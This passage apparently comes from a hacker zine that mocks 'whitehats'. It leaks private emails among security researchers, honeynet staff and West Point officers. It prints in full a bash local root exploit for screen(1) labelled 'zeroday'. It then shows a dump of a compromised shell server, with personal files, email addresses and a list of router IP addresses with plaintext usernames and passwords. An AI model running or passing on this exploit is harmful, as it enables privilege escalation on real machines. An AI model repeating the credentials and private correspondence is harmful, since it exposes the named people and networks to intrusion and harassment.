they had -debug on and they logged some information to * /var/dt/tmp/DTSPCD.log * * * For fix information see: * CERT Advisory CA-2001-31 Buffer Overflow in CDE Subprocess * Control Service * * * some thanks/greets to: * gersh, yowie, plaguez, sircasm, K2, silitek, SolarDiz, _j_j, none, %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: no D1ck ir sin Subject: RE: . Noir, check this out... a friend of mine coded it up... I'll get ya that ttdb sploit soon, I'm just travelling in the US right now. I hope you hadd a good Xmas/New Year... Later, K2 noir sin wrote: > Hi K2, > > nothing much these days, I am packing up ; ). will change the damn place I > am living .. so not much coding or anything > so how you doin? btw, happy new year > > > BTW: I passed your code to a couple of ADM guys, they really liked it. > which one telnetd or Tru64 ttdb ? > > I didnt work on the ttdb fmt exploit lately. I will be so much happy if you > could enlighten me about the issue ... > Actually, I am working out a project that will pack almost all known > exploits and some unknown exploits > for Solaris and maybe some Tru64. ( well main reason is I only got some > Solaris boxens and a Tru64 access ) > > I wish to keep in touch with skilled ppl like you, I believe we can exchange > real good info. > > take care, > noir > > -----Original Message----- > From: K2 [mailto:ktwo@ktwo.ca] > To: noir@olympos.org > Subject: . > > noir, How is it going? You getting that ttdb code working? I've got some > time next week if you still having trouble, I'll work it out. > > BTW: I passed your code to a couple of ADM guys, they really liked it. 
> > Take care, > K2 > Attach: dtspcd-8.4.tgz Size: 30K note: a glimpse of the most elite zeroday trading network %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: J4ne Subject: West Point Hey Lance, Glad to hear that nfo helped out :) I got clearence to get late february off to go speak if the spot's still open :) Lemme know thx!! K2 %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Lance Spitzner Subject: Re: dtspc attack Expect a ADMmutate copy eventually ;) but i was talking to my man... and like you can ask me questions to relay to him if you want. Cool about West Point I'll leason with Dragos for flights and stuffs... Thx again. K2 Lance Spitzner wrote: > K2 wrote: > > Hey Lance, This version of the dtspcd exploit has been out for quite some > > time. at least 3 months, it's the same version Ihave. Do you know what > > signature it set off from snort? > > Standard SPARC Shellcode, alert below. > > [**] [1:645:2] SHELLCODE sparc NOOP [**] > [Classification: Executable code was detected] [Priority: 1] > :05.950417 208.61.1.160:3594 -> 172.16.1.102:6112 > TCP TTL:48 TOS:0x0 ID:41402 IpLen:20 DgmLen:1500 DF > ***AP*** Seq: 0xFF24BFA4 Ack: 0x5F79CFDD Win: 0x3EBC TcpLen: 32 > TCP Options (3) => NOP NOP TS: 463986841 4158950 > [Xref => http://www.whitehats.com/info/IDS353] > > > The guy that wrote it put in some passwords for binaires that would be > > distributed, so unfortuntatly some kiddies probably got it and are running > > it all over the 'net :( > > heh heh, I sure do. First, do you have an exact date when this code > exploit was written? I'm curious to see how long it went from actual > code to the the kiddie community. > I'm thinking of writing a KYE paper on this exploit. The paper would > outline the life cycle of an exploit. From vulnerability identification, > to exploit code, to common kiddie use. We seem to have knowledge of > all the elements. 
This would make a very beneficial paper to the > community if we could document this process. What do you think about > such a paper? We would need some input from the person who wrote the > exploit, but anonymity would not be a problem. I know alot of .gov/.mil > people would be very interested in such a work. Thoughts? > > By the way, you are famous as hell with the following agencies, Max > Kilger and I talked about you. > > NSA, CIA, FBI, DoD, NSF, NIST, DARPA, NPS, DoJ, Secret Service, etc ... :) > > love and kisses ... > > lance > note: ktwo and lance are the best narc duo i've ever seen %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Lance Spitzner Subject: Re: West Point, we are a go Lance, What dates should I get booked off from work? (I'm actually just going to work remotely, so I can be pretty libral). What format will the talks be? Any of the SUN box's look pretty fly man :) I love rack mount!! I'll take a peek at that paper soon, I'm remote from home until next week so I'm pretty slow on a few things (I am in the US right now). TTYL! K2 Lance Spitzner wrote: > All right gents, > > We are a go for West Point on 26 December. Dragos, > as always I'm putting in a personal request for the > leather pants. I need a bio from you folks, so send > me one before Monday if possible. They need the bios > so they can determine just how many people are going > to attend our presentation :) > > They asked for estimates on travel expenses, this is > what I gave them (just for travelling). > > Dragos/K2 - $1,200 each > Michael/Jeff - $150 each > > Go ahead and make your travel arrangements know (especially > K2 and Dragos). If my travel estimates are off, I need > to know now. This is what they told me about airports > --- snip snip --- > > The best airport is Stewart/Newburgh (SWF) about 20 miles north of West > Point. 
Other airports in order of ease/distance include: > > Newark, NJ (EWR) > LaGuardia, NY (LGA) > JFK, NY (JFK) > > Although I have never flown in/out of Westchester (HPN), I have heard > positive things about the airport if you can get a flight. > > --- snip snip --- > > -- > Lance Spitzner > http://project.honeynet.org %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Viz Engine Subject: Re: your mail Sure, I'll take a look. K2 Viz Engine wrote: > hi, > > I have a privat exploit for wu-imapd, developed it for linux and BSD. > Since I have no access to Solaris or HP-UX I would like to ask you to > port it to that systems. Would you? > > Viz %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Lance Spitzner Subject: Re: glined glined is a type of ban off IRC "I was glined" == "I was globally banned from the undernet" if you connect multiple times to IRC with the same IP (3 or more), you will be glined (for abuse) Take care, K2 Lance Spitzner wrote: > Dude, > > What in the hell does 'glined' mean? This is taken > from the GFORCE chats. > > :D1ck :i have the whole billing system > :D1ck :glined > :D1ck :i have the whole billing system of example > :D1ck :oye > :D1ck :heh > :J4n3 :lol > :J4n3 :glined how ? > :J4n3 :they didn't have the same ip > :J4n3 :billing system of example ?? > > Thanks! > > -- > Lance Spitzner > http://project.honeynet.org note: lance is a dumb fuck %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Lance Spitzner Subject: Re: dtspc attack Here is what I got from jduck, (talk to him too see if he wants his name in the final report though). I can help with the writeup when I get back to Van, jd said it's cool if you contact him too. [jduck(dcc)] 1. discovered by aix in 1999 [jduck(dcc)] aix fixed it in 1999 [jduck(dcc)] 2. re-discovered by ISS in 2000 in solaris [jduck(dcc)] err 2001 perhaps? 
[jduck(dcc)] disclosed to sun in march 2001 [jduck(dcc)] cert/iss/etc disclosed to public november 2001 [jduck(dcc)] exploit created late november 2001 [jduck(dcc)] given to trusted people and testers [jduck(dcc)] careless left around by certain people and stolen < [jduck(dcc)] shared by unknown others jdrake@qoop.org %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: R1Ley Hassell Subject: Re: Hey man sure, just keep it to self right ;) What's new? I'm still lookin for new work :( Later, K2 Riley Hassell wrote: > You got a copy of the new dtspc sploit? > > -R > Attach: dtspcd-8.6.tgz Size: 35K %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Lance Spitzner Subject: Re: dtspcd exploit usage OK, gimme some time on this one, I've never used the sploit. Lance Spitzner wrote: > K2, > > Dude, I notified several .gov agencies that we > have obtained the exploit. They can use this > information to better protect against attacks. > I figured your buddy will not mind, as we obtained > it from 'the wild'. > > Anyways, could you give me a short paragraph on > how the exploit works and is used? Organizations > need to understand how the tool works, and how > the kiddies can use it. You are the > expert, so your insight will greatly help. > > Thanks! > > lance > note: cant figure it out smart guy? %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Lance Spitzner Subject: Re: dtspcd exploit obtained (fwd) I'll ask him Lance Spitzner wrote: > Your buddy interested in chatting with the MITRE folks? > Alot of people are very impresses with his exploit :) > > -- > Lance Spitzner > http://project.honeynet.org > > ---------- Forwarded message ---------- > From: J4ne Gray > To: Lance Spitzner > Subject: Re: dtspcd exploit obtained > > I went to the apparent authors website.
It hardly mentions an interest in +security, > but it does look like he used to teach at the University of Central Michigan > http://jdrake.qoop.org/art/ has some pictures of him. Are you familiar with +this > person at all? > > I'm wondering if he didn't write this code to teach someone else and then that+person > started distributing it. This guy looks like he knows his stuff and not +stripping the > symbols doesn't seem to fit with that. > > Josh > > Lance Spitzner wrote: > > > J4ne Gray wrote: > > > > > It was very nice of the author to include his name and email :). I was +looking > > > at the strings output and it looks like the author took a lot of time to +do error > > > checking and write one of the better usage statements i've seen. I also +didn't > > > notice a single misspelling and no script kiddish text at first glance. +To me > > > that says a few things about the author. Is this typical of what you see +in > > > exploit code? Most of the stuff i've seen in public postings is nowhere +near > > > this clean. > > > > Its extremely well written, and powerful. Definitely not our > > typical exploit :) > > > > lance %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Lance Spitzner Subject: Re: dtspcd exploit obtained (fwd) that's funny Lance Spitzner wrote: > K2 wrote: > > > I'll ask him > > Dude, this is not a big deal. Just a lot of > people interested in his exploit code, its more > impressive then most. NSA and FBI even asked > me for a copy. :) > > lance note: nsa cant write their own version? %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Dug Song Subject: Re: feh lame o KIller man, thx :))) Dug Song wrote: > this is the most retarded shite: > > http://www.ngsec.com/whitepapers.html > > btw, i rewrote fragrouter as fragroute (runs on your local > machine). 
evades everything, including snort, and it will hide all of > your shellcode NOPs as well, with any of the TCP chaffing attacks or > TCP segment forward overlap: > > http://www.monkey.org/~dugsong/fragroute-0.1.tar.gz > > don't redistribute, it's rough code that i want to clean up for > release sometime... > > -d. > > --- > http://www.monkey.org/~dugsong/ %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Cloakware Corporation Subject: Re: Network Intrusion Detection Charlene, I was just wondering, Stanley told me about a demonstration package of your cloaking technologie where a binary with some source code is sent out. Do you think I could have a copy of this? Thanks much, Shane %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Lance Spitzner Subject: Re: IRC chats Well, It's probably a spoof... beer:~# telnet pentagon-hqdadss.army.pentagon.mil 23 Trying 134.11.6.1... Connected to pentagon-hqdadss.army.pentagon.mil. Escape character is '^]'. VM/ESA ONLINE--HQDADSS --PRESS BREAK KEY TO BEGIN SESSION.^] telnet> q Connection closed. VM/OS box, idono, Idoubt that somebody is IRC'ng from there ;) CU K2 Lance Spitzner wrote: > Looks like one of the guys is coming in from pentagon.army.mil. > Is this correct? > > -- > Lance Spitzner > http://project.honeynet.org note: its the analyzer!!! %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% ---------- Forwarded message ---------- From: Matt Conover To: w00w00@blackops.org Subject: w00w00 with TechTV TechTV had a segment on the ethics of hacking with a featured commentary on w00w00. See it at http://www.techtv.com/news/security/story/0,24195,3369909,00.html. Matt note: w00w00 looks lame lately, keep it up! %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Catherine Nolan Subject: Re: your mail Catherine: Here you are, sorry for the sparsity but I am very private about many of the details outlined by the bio guidelines. 
K2 is a security engineer. He works on a variety of systems ranging from most any UNIX flavor to any other lesser OS. He has spent a lot of time working through security issues wherever they exist; core kernels, networking services or binary protections. K2 is a member of w00w00 and is a contributing member of The Honeynet Project. I would like to thank Anya for all her help and support throughout the year. Thanks, K2 note: Cathy, could you please add: k2 is also owned %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Catherine Nolan cc: Kate Glennon Hi, Sorry I've been in Toronto all week and did not see these mails (i've only had remote access to mail). I'll get the changes back to you by tomarrow morning. Thanks, K2 Catherine Nolan wrote: > Hey K2 - > I need your revisions today.....the book is going to the printer next week > and I need to have your chapter copyedited, laid out, and reviewed. > If the book doesn't go to press next week - we're not going to have books in > time for doubleday book club. Doubleday has ordered a significant number of > copies for a promotion - the books must be in their warehouse by March 4th. > It takes at least a week and a half to print a book - usually longer. As a > royaltied author - if we miss this date - we miss 3500 units in sales. This > will affect your income from your contribution considerably. > > They are not happy if we don't ship our books on time. > > I cannot impress upon you the urgency of this matter - your revisions were > due on Monday - it is now Thursday. > > Please send these revisions to me as soon as you can - preferably before the > end of the day. > > Thank you, > Catherine > > Catherine B. Nolan > Acquisitions Editor > catherine@syngress.com > 781-681-5151 ext 18 > > Syngress Publishing > 800 Hingham Street > Rockland, MA 02370 > http://www.syngress.com %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: "Presby, T. 
MAJ EECS" Subject: Re: USMA - Honey Net Travel Arrangements Major Presby: Thanks for your help, I was just wondering if is possiable that I change the return portion of this trip to layover in Kansas City until Sunday March 3 I'll pay any difference in cost (it may even be cheaper with the Saturday stay). Thanks, K2 Presby, T. MAJ EECS wrote: > K2, > > Your invitational travel orders are complete and we look forward to your > visit later this month. An electronic ticket has been generated and will be > waiting for you at the Vancouver Airport. A complete itinerary is available > at https://virtuallythere.com. Use the following reservation code and your > last name to view your itinerary. > > Reservation Code: ESEUXD > > Your flight travels via Chicago to Newark, so you will be on the same flight > as Dragos Ruiu and Lance Spitzner. Lance is authorized the rental car, so > you will travel in one vehicle to West Point. > > Your lodging costs will be covered during your stay. Please contact the > Hotel Thayer to reserve and hold your room for 25-26 Dec with your credit > card (you will be reimbursed after the fact). Hotel Thayer has a website > http://www.hotelthayer.com/ and they can be reached at 1-800-247-5047. > Ensure that you mention that you are traveling under invitational travel > orders and require the government rate. > > Please feel free to contact me if you have additional questions. We look > forward to your visit. > > Tim > Major Timothy Presby > Asst. Prof., Dept. of Electrical Engineering and Computer Science > United States Military Academy, West Point, NY 10996 > Thayer Hall 113 Phone: 845-938-5569 DSN: 688 > Email: timothy-presby@usma.edu note: hey timmy, smile for the cameras!! %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Subject: !.? miss you %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: joewee Subject: Re: defcon? joewee: where are you ? I'm in NYC now. 
TTYL K2 joewee wrote: > from dt; > > > Sounds very cool. I'd be interested in reading the book when it comes > out. People always talk about writing a book like that, but no one ever > does. > On another note, do you know if ADM or w00w00 has anything up their > sleeves > that might make for a good release at DEF CON? With the cDc basically > falling through the last two years we are looking to see if any > respectable > groups have something cool they want to showcase and release come con > time. > > ---- > > anyone plan on going to defcon? %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Lance Spitzner cc: 'Dragos Ruiu' , Subject: Re: ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT (fwd) From what I hear gobbles is a composit, (made up from more then 1) person(s). But it's all speculation anyhow. There's tons of Solaris holes, and a grandious claim that "if you run it your vuln" is always BS, I'm sure a moderately hardend host would be fine. ttyl, K2 Lance Spitzner wrote: > Who the f*ck is this guy. He repeatedly has the most interesting > posts I've ever read. The note at the bottom has me concerned :) > > -- > Lance Spitzner > http://project.honeynet.org > > ---------- Forwarded message ---------- > From: gobbles@hushmail.com > To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org, > vuln-dev@securityfocus.com, bugs@securitytracker.com > Subject: ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT > > Dear World, > Below is copy paste of GOBBLES advisory for NTOP. NTOP available from +www.ntop.org. This serious remote root bug in logging mechanism. Time for +alert and disclosure is now. > > Website with other advisories at http://www.bugtraq.org. It look like shit +because on free host. GOBBLES poor researcher who not out for the big dollar, +and nothing that can be done about this at this time. > ... > Greets: > Our #1 fan, Dave Aitel. 
Dave, GOBBLES love you -- you get free GOBBLES Security tshirt at Defcon. > > > Love to all (but especially to "bob"), > GOBBLES Security > http://www.bugtraq.org > GOBBLES@hushmail.com > > > ps: GOBBLES currently in communication with Sun Microsystems about lethal remote bug in Solaris 6, 7, and 8. Sun has asked GOBBLES to wait one month to release advisory so that service can be fixed. GOBBLES not sure if he can wait this long, but will try very hard to not click "send" for while longer on hole. If you run Solaris, likely you are vulnerable. But you will have to wait. > > No joke, this serious remote root hole. GOBBLES turned blind eye to argument from hackers about danger of releasing vulnerabilities. GOBBLES know that only hackers care about non-disclosure. Anyone else is likely to be very boring. :)))) > > Hey, GOBBLES considered two ways of getting fame and recognition for he world-class security group... 1. put up a message board on bugtraq.org with gobbles group name branded all over it and let world know he have private exploits... 2. submit ground-breaking research to the securityfocus mailing lists..... > > hey, the latter has a bigger audience ;))))))) > > Hush provide the worlds most secure, easy to use online applications - which solution is right for you? > HushMail Secure Email http://www.hushmail.com/ > HushDrive Secure Online Storage http://www.hushmail.com/hushdrive/ > Hush Business - security for your Business http://www.hush.com/ > Hush Enterprise - Secure Solutions for your Enterprise http://www.hush.com/ > > Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople > ------------ Output from pgp ------------ > Pretty Good Privacy(tm) Version 6.5.8 > (c) 1999 Network Associates Inc. > Uses the RSAREF(tm) Toolkit, which is copyright RSA Data Security, Inc. > Export of this software may be restricted by the U.S. government. > File is signed. signature not checked. > key does not meet validity threshold. 
> WARNING: Because this public key is not certified with a trusted > signature, it is not known with high confidence that this public key > actually belongs to: "(KeyID: 0x2199B00F)". note: GOBBLE GOBBLE, lance afraid of the turkey?! :PpppPPpPPPp %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: "Ragsdale, D. LTC EECS" Subject: Re: Glad to hear you are coming to NY LTC Ragsdale: I'm glad that most of the exploits worked. The local privalage escalation exploits may be a little more trickey, I think I had sent a couple whitch will break a non-executable stack, these tend to be a lot more fradgile, maybe play with the stack offset values and script a brute forcing script... Sure, I'm sort of hap-hazardly getting my life together here, I'm booked solid through May-5, but will be available after that. Let me know whenmight work for you and I'll work with that. Talk to you later, K2 PS. My recent trip reminded me that almost 4years ago I nearly enlisted to the US Army, but then decided to go on for more school. Ragsdale, D. LTC EECS wrote: > K2; > > The Solaris exploits you sent were excellent. They were just what I > needed. I had luck with all of them except the user2root buffer overflows > - I could not get the offsets right. Any suggestions? > > Also, is there any chance we could convince you to spend a day with > us in the near future? We would pay any travel expenses and, possibly, > provide monetary compensation for your time. We would ask you to assist us > to by implementing working exploits in our lab. Tell me what you think. > > -Dan note: well Liutenant dan, ktwo already works for CSIS, sorry! %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% ############### I N C L O S I N G %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% i hope you enjoyed this little look into the liFe of a whitehat, which can be summed up in: m0nEy-Ca$h-lameness. 
from mediocre crackers, to full blown security professionals, you've certainly made it easy on us! ktwo, be gracious we left out your kewl poems! catch me next month as i feature more whitehat allstars for your viewing pleasure. NO MERCY FOR WHITEHATS!!@#@# -- odaymaztr .~e~----------------------------------------------------------~e~. ; *03* zeroday screen exploit -- lcamtuf ; `----------------------------------------------------------------' [CUT_HERE] screen.sh #!/bin/bash # **DO NOT DISTRIBUTE** # # A simple screen(1) exploit (tested against 3.09.11) # - by Michal Zalewski (lcamtuf@bos.bindview.com) # ---------------------------------------------------- # Usage: "./unscreen", then resume screen `00'. # ---------------------------------------------------- # Ugh, blah... Should be written in C, but I don't # really care now :) # I haven't had time to check other versions, but see # if this works for you too... # # This exploit is private, but you know that already... # # **DO NOT DISTRIBUTE** # SCREEN=/usr/bin/screen umask 0 if [ ! -x $SCREEN ]; then echo "I can't execute $SCREEN..." exit 0 fi LINK=`echo $HOME|awk '{print $1 " "}'`.pts-00.dupa if [ -f "$LINK" ]; then echo "DAMN. I don't have usable pts socket available..." exit 0 fi echo -ne "Finding root owned tty...\t\t" unset TTY for x in /dev/tty[0-9]* /dev/pts/? /dev/pts?? ; do if [ "`ls -ln $x|awk {'print $3'}`" = "0" ]; then TTY="$x" break fi done echo -n "$TTY" if [ "$TTY" = "" ]; then echo -e "\nI can't find a root owned tty!" exit 0 fi if [ ! -w $HOME -o ! -w /tmp ]; then echo -e "\nI can't write $HOME/.screenrc or to /tmp..." 
exit 0 fi cat >$HOME/.screenrc <<_EOF_ vbell on defscrollback 100 autodetach on termcapinfo * '' 'hs:ts=\E_:fs=\E\\:ds=\E_\E\\' defsocketpath $LINK _EOF_ echo -ne "\nStarting screen...\t\t\t" $SCREEN -S 00 -c $HOME/.screenrc -aA -m -D -q &>/dev/null & SCPID=`echo $!` echo -n "PID: $SCPID" while :; do sleep 1 if [ "$#" -ge "0" ]; then break fi done cd /tmp ln -fs $LINK $HOME/ &>/dev/null echo -ne "\nWaiting for socket to be created...\t" CNT=5 # Timeout while [ "$CNT" -gt "0" -a ! -f "$LINK" ]; do let CNT=$CNT-1 sleep 1 done echo -n "Done." echo -ne "\nLinking to root owned terminal...\t\t" ln -fs $TTY $LINK &>/dev/null echo -ne "\nComplete. Now do \"$SCREEN -r 00\".\nCleaning up..." $SCREEN -wipe &>/dev/null & rm -fr $HOME/.screenrc $LINK &>/dev/null echo -ne "\rComplete.\n" exit 1 [END_CUT] screen.sh .~e~----------------------------------------------------------~e~. ; *04* lyfestylez of the owned and lamest with pm -- r0b1nleech ; `----------------------------------------------------------------' PART ONE: Hello, and welcome, to lyfestylez of the owned and lamest hehe Our guest today is pm. pm runs one of the most secure + shell systems known to mankind, tell us about your system pm. well robin, first off i would like to introduce myself my handle stands for prepubescent monkey, no just kidding! it + stands for plurbious monk. i have hosted one of the most well known + and well renounced shell systems ever. yes thats right, i run sneakerz.org :D sneakerz.org is home to some of the finest hackers that grace + our planet earth. freebsd employees and yahoo employees also use + our super secure system. Hey pm, tell our viewers where you have worked recently :) well robin, i have worked at Yahoo!, google, hotmail, microsoft, and + iss. i have been all over.. hehe Thats quite a line up. yes r0b1n, i have a vast amount of security knowledge, i am a + security professional. props to w00w00 and ADM! oh ya, HFD! 
oh i would like to also state that: I HAVE NEVER BEEN OWNED, IF YOU + SAY YOU OWN ME, SHOW ME SOME FUCKING LOGS. IF YOU DONT HAVE LOGS + SHUT YOUR FUCKING LAME MOUTH BECAUSE YOU DONT OWN SHIT. hehe So pm, which known hackers have used your system? well, off the top of my head there is: jobe, napster, billf, + ratcorpse, par (cant fucking forget the par master), jbl, stran9er, + darkcube, jduck, shok, cr, cryp, suid, dmess0r, nimrood, duke + mux, yowie, udp, korndogz (kinda lame), awnex, jimjones, soupnazi, + miff (9mm HFD!), paul, and knowfx. damn i have a good memory hehe I would like to point out for a second that napster is + the guy who started napster.com, jbl is cripo of SSG, cr is one + of the best known crackers in hacker history (unix bowling team), + and duke is the best whitehat i have ever seen. yes i've watched cr hack before, he's real good and props to #!w00w00 on efnet What is the #!w00w00 key? no key for you r0b1n :) route and dugsong hang out there, really elite channel let's take a break for a second and watch some midget porn PART TWO: Welcome back, let's get on with the show. hehe I am currently on pm's system, this is an amazing sight. + This system is so locked down its ridiculous. I don't think anyone + could ever hack this. yes r0b1n, its secured real tight, and has custom freebsd kernel mods. I am currently sitting in the root directory, pm, show us + around :) why of course r0b1n. hmm where to start ok, lets just go straight to the good stuff first # cd /home/staff/monk ok here we are, my sacred directory, this is where all my private + files go, all my warez, and all my mail goes. 
# ls |less 983.tsl_bind.c* lice420pre7.tar.gz* BigIron-EXO1.tftp* lo* BigIron-Exo1.tftp* mail/ BigIron-HE1.tftp* md5passwd.c* BigIron-HE2.tftp* me.jpg* BigIron-SU1.tftp* moo* BigIron-SU2.tftp* ms-ip.txt Extacy.c mutt-sneakerz-14095-0* Mail/ mutt-sneakerz-309-0* Messages* mutt-sneakerz-43165-0* NetIron-HE1.tftp* new-server-guidelines.txt* NetIron-HE2.tftp* newircd.tgz* NetIron-SU1.tftp* par* NetIron-SU2.tftp* par2.pl* README* pixconfig* README.skuld* pm* Trng-07_BGP4.ppt* pos.ppt* _mywctb.ircrc* quotes.txt* a* res.txt* a.c resume.txt* acl.txt* rh7linuxconf.pl.txt ascii_woman.txt* route.gif* babykitty* sendmail.c backup.sneakerz.monk.2.28.01.tar.gz server.sh* bgp.exo* shells* bobek.c* sinner* cbufp_cb.pdf* sk8.bx* cco.txt* skuld3.tar.gz* chbin* solx86_bind.c cisco* story* cluepon.txt* temp/ dave.jpg* textbox.irc.lb3* fakepmap.c* tmp/ fbsd2.c* tranny.asc* foodfight.swf* tronban* freebsd.app* tsl_bind.c* freebsd.app.old* vchans.txt* h0h0cc.asc* wanker-14.jpg hardcopy.0 wctb.irc* hm/ wu2.6.1.c* ircchiq.tar www/ kline* xf0rce.zip libproxybnc-2.0b.tar.gz Wow, what an absolutely stunning home directory, you + so elegantly define caviar dreams. 
i try, hehe, thanks r0b1n Ok, show us some of your files why of course $ head imnotownedstill.txt :p_m!dave@right.behind.you PRIVMSG #!w00w00 :gobbles sucks balls :p_m!dave@right.behind.you PRIVMSG #!w00w00 :we should make them eat our shit :p_m!dave@right.behind.you PRIVMSG #!w00w00 :then shit out our shit :p_m!dave@right.behind.you PRIVMSG #!w00w00 :then make them eat the the shit that they shit that was our shit that we made them eat :p_m!dave@right.behind.you PRIVMSG #!w00w00 :*read slowly* :p_m!dave@right.behind.you PRIVMSG #!w00w00 :GOBBLES: :p_m!dave@right.behind.you PRIVMSG #!w00w00 :"ALL YOU MOTHER FUCKERS ARE GONNA PAY, YOU ARE THE ONES WHO ARE THE BALL LICKERS, WE'RE GONNA FUCK YOUR MOTHERS WHILE YOU WATCH AND CRY LIKE LITTLE WHINEY BITCHES, ONCE WE GET TO HOLLYWOOD AND FIND THOSE MIRAMAX FUCKS WHOS MAKEN THE MOVE WE'RE GONNA MAKE THEM EAT OUR SHIT THEN SHIT OUT OUR SHIT AND THEN EAT THEIR SHIT THATS MADE UP OF OUR SHIT THAT WE MADE THEM EAT AND THEN ALL YOU MOTHERFUCKS ARE NEXT" :p_m!dave@right.behind.you PRIVMSG #!w00w00 :-w00w00 ok lets see, ah, shells is a pretty private file, i use it for + hacking elite shit. 
# head -n 20 shells 12.0.40.1 - cisco 12.127.196.202 - cisco1:cisco 131.192.70.218 (s0.inso.bbnplanet.net) - cisco 157.130.68.154 (rutenberg-gw.customer.ALTER.NET) - cisco:cisco 192.195.18.6 (cisco.nstor.com) - cisco 194.149.131.1 (e0-rbs1.MARNet.mk) - gone:quattro224 / ena:%qqriq% 194.149.131.10 (e0-0-rbs3.MARNet.mk) 194.149.131.127 (tc.rek.ukim.edu.mk) - gone:quattro224 / ena:%qqriq% 194.149.131.3 (e0-rbs2.UKIM.edu.mk) 194.149.144.1 - gone:mitre-strelata / ena:rtremt-toboim 194.149.148.2 (rtrzsv.zsv.ukim.edu.mk) - gone:quattro224 / ena:%qqriq% 194.149.150.1 - gone:quattro224 / ena:%qqriq% 194.98.212.19 (bowne-gw.iway.fr) - cisco 200.41.13.242 (200.41.13.242.celcaribe.net) - admin:admin 200.41.13.253 (200.41.13.253.celcaribe.net) - admin:admin 202.109.81.230 - cisco:cisco (switch) 202.161.128.22 - cisco 202.54.40.17 - cisco:cisco 204.167.134.158 (s0.aww.bbnplanet.net) - test:test 207.115.184.1 - cisco Oh, My, God, are those seriously .edu.mk routers?! :) ok check this out # ls Mail 4166174806@mobile.att.net jack@google.com spider@funksion.org beep-spider@jsnet.com knowfx@sneakerz.org spider@hotmail.com beepspider@jsnet.com monk@sneakerz.org spider@sneakerz.org binary@ruiner.halo.nu paul@mu.org sweetiegirl331@aol.com bright@wintelcom.net promo@akula.com walt@hotmail.com dav@sneakerz.org soupnazi@sneakerz.org i met sweetiegrl331 in #linuxteens, damn shes amazing Love :) Hey, I noticed a route.gif in the above output of ls? thats route naked at r00tparty 3. 
enough with my homedir for a second, lets check out ratcorpse's # cd /home/users/rat # ls Mail/ funny* me-modified.jpg* rc.c* adaptec gogo226a.tgz me-original.jpg* shrt* ass2.doc* hahaha mp3s.txt* sk8.bx* badass.jpg hehh* ncurses.h sk8.irc* blingbling.jpg index.html* netscape1.c.txt* term.h buffr.c* ircrc.example* newfris.jpg* tmp/ damnfunny ircrc.global* ns* tron.txt* dickd.tar.gz* jim* orange1.jpg url* elite.c* leto* pageexec.txt* vas0103.txt* epic* llist.c* patch-howto.html vhosts* f* log.txt r* wargames* fefe.zip* mbox rand0m.c* www/ shes so funny, check out the www # ls www/ 06cubicl.jpg* leet.adv* pumpkin.jpg* Bow-lusta.txt* lice420pre7.tar* resume* OBSDecian* links.html* route.gif* akittens-confessionz* list* route.jpg* angieb.jpg* logs.html* rpclogo.jpg* crow/ look.jpg* s/ cvf-sk00led* m1x* sexchart* cvf-sk00led2* me.gif* shot/ dance.gif* me.html* siphon-v.7.tar* duke/ misc/ slut1.jpg* dumbkitten.txt* mixowned* slut2.jpg* dxmd.jpg* modified.jpg* some-funny-ass-takeover* dxmpix/ p.jpg* sundevices.beta* freestyle* pageexec.txt* toomuchtime.jpg* fugly/ party/ u4ea-skooled* ghettodxm.jpg* phat1.jpg* url* gookfest.jpg* phat2.jpg* war* greets.html* phat3.jpg* warped.jpg* gross/ phat4.jpg* weed.jpg* housewarming.jpg* phracklog* whore.jpg* hp2.adv* pix/ work/ in-bud-we-trust.jpg* potleaf1.jpg* index.html* prankster.jpg* lol, thats confidence This is great, are you getting all of this guys? hohohoho check this out # cat mailstuff | less bright:> To: bright@sneakerz.org bright:Delivered-To: alfred@freebsd.org bright:Delivered-To: bright@sneakerz.org 